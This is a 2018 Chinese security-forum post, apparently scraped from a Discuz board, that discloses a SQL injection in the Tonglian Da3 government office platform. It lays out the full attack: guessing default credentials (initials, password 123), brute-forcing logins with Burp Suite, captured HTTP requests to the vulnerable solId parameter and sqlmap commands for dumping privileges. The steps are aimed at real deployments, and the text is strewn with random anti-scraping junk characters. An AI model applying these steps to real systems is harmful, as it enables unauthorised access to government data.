中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

9 f5 V2 T& O7 e3 p
@" a. Q; s" \: m0 `# y$ }+ ]

. }0 h4 C" ^# m5 J% P/ S/ X

2 A7 u# F2 x9 l 平台简介: 2 [, n' ^) M) w* K) `6 }5 s: f

) a4 D; D5 {8 F% \

0 ]% [& x! T8 x$ B6 v O  $ w: r- N" B. B4 [* G1 e

! Q: i0 t; M# B9 w6 g

$ z8 ^7 B, T4 S; Y; j5 ~ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
- }1 h7 ~ s* k6 f! Y同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
4 d$ r+ m+ Z# i% e4 \0 k同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! ) c2 X- K2 C( Q. Q

1 [8 `' \: |5 Q9 K

3 h3 ^7 J x! e. ~5 j6 J, a: V   ^0 c' O1 A5 t& j5 n, F6 P5 y4 f

% u' v x) A" g" O1 [

( a! J- l: R% T _0 `. v% j0 q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: t3 O! Z! ?: K5 H

; _: x2 @: }. L+ _: ]% f* a

9 z! d, x+ ]2 b/ G! Q N0 k  % L! S! e6 m X% Y- a! j+ X

4 Y5 {; U6 Z) b6 T* Z$ W; X

, S/ _' d9 u S6 w" I http://1.1.1.1:7197/cap-aco/#(案例2-) + F5 X8 f& z+ c* [

2 x1 N* l' f3 s) l

& [+ T: m9 q+ j* F: I http://www.XXOO.com (案例1-官网网站)4 m, C d8 B9 G* K" G

/ K9 M/ |9 m0 Z4 O( L/ X4 k, M0 d

0 k/ E8 L& q* u9 O5 t" e   S8 W) C& E9 v2 Q( m& w; u

1 ^) e p$ H1 B; p& I

8 b! Y, u2 R0 c% r2 e 漏洞详情: 7 ]0 Q: H! I" C/ y+ {

; C" Q# y% Y: y8 Y' J. e

, K8 b$ q4 g! a3 {$ X. S  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试, u+ m! U+ Q; [ {% u

0 a" _7 W7 [1 X) ]

1 n* g# _ Z. |" t' _3 A- ^      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 4 O0 }, k z: {9 u5 G( \2 c

* ?0 o- |/ e" `. l

# l! J. O+ U% w9 W! l2 g* N. M% L" i/ g   : d) u: p6 R2 |5 u& K* H

5 `* ?$ `' e5 v6 s& ^* D1 I, |

: { f* o; @ G; [* V+ u$ y" a  / I& z, X% O h3 `

3 h2 b4 {" U5 _" q8 [5 [( y

: K! U0 H. Y* T+ { status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:- c0 K2 t) k8 U+ T% ^/ L& }; E

" c3 ~+ v. `+ r* F) j2 d) M

* Y% ~, T: |' i/ v5 D 1、案例1-官方网站 - M0 @' }7 M" I! k

# s% @* j. B1 N

$ S8 y3 ]! ?9 e- A6 k, X GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1' A: m4 B# |: E: q' o

5 @) W! T4 H8 k E3 E+ J" Z2 s

! E0 G( B4 Y* W. o; P, O0 O Host: www.XXOO.com y% w3 b* O$ m6 V/ F3 ^* Q

: M2 V' n& F/ O* }9 k4 Q

+ U! A$ _; a. O' t& }/ W Proxy-Connection: Keep-Alive2 m2 _9 \* @+ H' E& {5 g& `

# L; X/ k8 _0 h1 W8 y" }. @/ j

0 |, W+ N) r" S3 O6 N, e+ L Accept: application/json, text/javascript, */*; q=0.01 9 ]# S7 p9 |6 e ]. [; Z$ n4 K$ a5 ^

6 I+ N3 J& s% `

- F2 T* @, Q. J7 i* r5 j, }( f Accept-Language: zh-CN* K) B3 L. W# Q0 G9 _4 p" P

) j# M3 t5 B3 V2 E0 I0 l2 M' a# n

) F3 K- y, B4 g+ b5 A: M2 q; F Content-Type: application/json 2 y4 i. e0 J+ ^) T) C# r

7 v0 a- a* P& y

7 ~" H. D8 p- |/ R+ _ R User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko % w) N$ z" i: i

! {0 P/ Z; J8 G$ n) ^$ b7 j

: J5 `0 H. u# b: p7 ^ X-Requested-With: XMLHttpRequest $ C: }) D, X+ k) g

% O( D! J2 a1 E3 s: Q. H

- d5 _$ |% r- v& u Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002; W Y* ?! M2 q( D1 K9 D

; Y% ?! X. D- Q! r" [, f9 T

' L/ f# m. M1 D7 | Accept-Encoding: gzip, deflate, sdch 3 d+ _8 e2 H( s3 H

) ]4 C+ J8 w" A( d" R! Z+ c

8 J4 g9 [' Y- o3 F) k7 c Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e* p/ d: x) _; [8 `, d% y

$ M. W4 e7 k8 [+ O0 \

5 x" J) A2 y7 q: }! _4 Q/ h 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 8 Q& U+ ^0 g3 t% `& y) R

) L% e" E6 y+ {* r" }' E

8 K+ Q' f" W6 f" w9 v  , w8 v4 v6 J1 \! u5 Z

5 c6 X6 y; Y% `, ]3 D0 ^

& t1 ~. n. x+ D+ M1 O- R+ H5 z& o   2 Q$ [& F8 B: v v$ t- Z

2 h3 n7 A8 X' G

z2 R3 t) h' l; L2 |0 X e; \   " a W- v Y2 d3 @$ ]

# Z, ^' p- k9 g* h

: Q- P2 w' `) o  . L8 Z+ Q. K7 \: N; c% g; d

1 o, z; M- c0 @/ e" H

6 P7 I( J: m+ V" S  ( Z9 M; }" R2 Q

# J! @! P9 ~- z4 V

* ~0 i& m8 D8 M" ~8 k) m- P% D 2、案例2-某天河云平台 7 X. ~3 k8 r, s- b* @

5 X+ t! R0 U: x8 M. f+ A

! w$ O) d7 X2 G% \& O GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1( T- b1 e3 D# `% g5 H

}3 h+ r/ w7 X# D

8 b) n& P: r: c! N4 B- u6 G; F7 f Host: 1.1.1.:71973 }3 u- _$ G: o- U- k/ c

, S* q4 z& P9 t7 b. |) m2 h

( U! Y7 y1 ]' ^( S6 l Accept: application/json, text/javascript, */*; q=0.011 U' I( R) {- x3 m( A5 I

/ A. u) m- T$ j; c/ u0 Q

: [% E6 g7 j% m! {- M0 G( z X-Requested-With: XMLHttpRequest , Y8 h$ y: x% t5 K' ^

5 _2 f: ?/ }. _0 @9 n9 T) k& C) t7 V

1 p8 a" U6 c8 K& s, e$ z X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 ! u& E7 ]) R' U9 F

$ O$ l& d2 |+ w. F0 X

8 t& G* {, z0 f/ m& U Content-Type: application/json4 ~# z0 s+ J& ]

# |% \% E. t0 ]( Z

9 P0 t r' e* m! H2 C Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008. z ]% O7 a. K" t- k T. u4 L

3 r! X. T l0 X0 n6 a

. X* A! k+ t* h! k" ^ Accept-Language: zh-CN,zh;q=0.89 `+ d/ }* E" D

' ?! y! E8 t5 `$ _, n. z

) @* H |% D3 K" n H Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 R- G0 e- @- l/ N1 v! {

`, k% @1 [6 U! b- s

4 r) s6 P W" h* e. n6 ~* I, E Connection: close1 B2 \: ?2 m* k6 W. Q' O2 K& G

3 \, m: G s# a: i% r

9 D, C3 I! b; l' s8 i; f# T1 U 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) L! T& ]2 U$ V4 R3 D u* f1 b+ k& w

! q+ }/ V8 h' a0 u# Y

4 H; W* s+ E/ T0 S% W   8 d+ K m n6 d, n1 q3 B* W$ ^

8 y. O1 {6 Q5 o

9 R# f$ _& e6 |
4 P* M" P; F" C






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2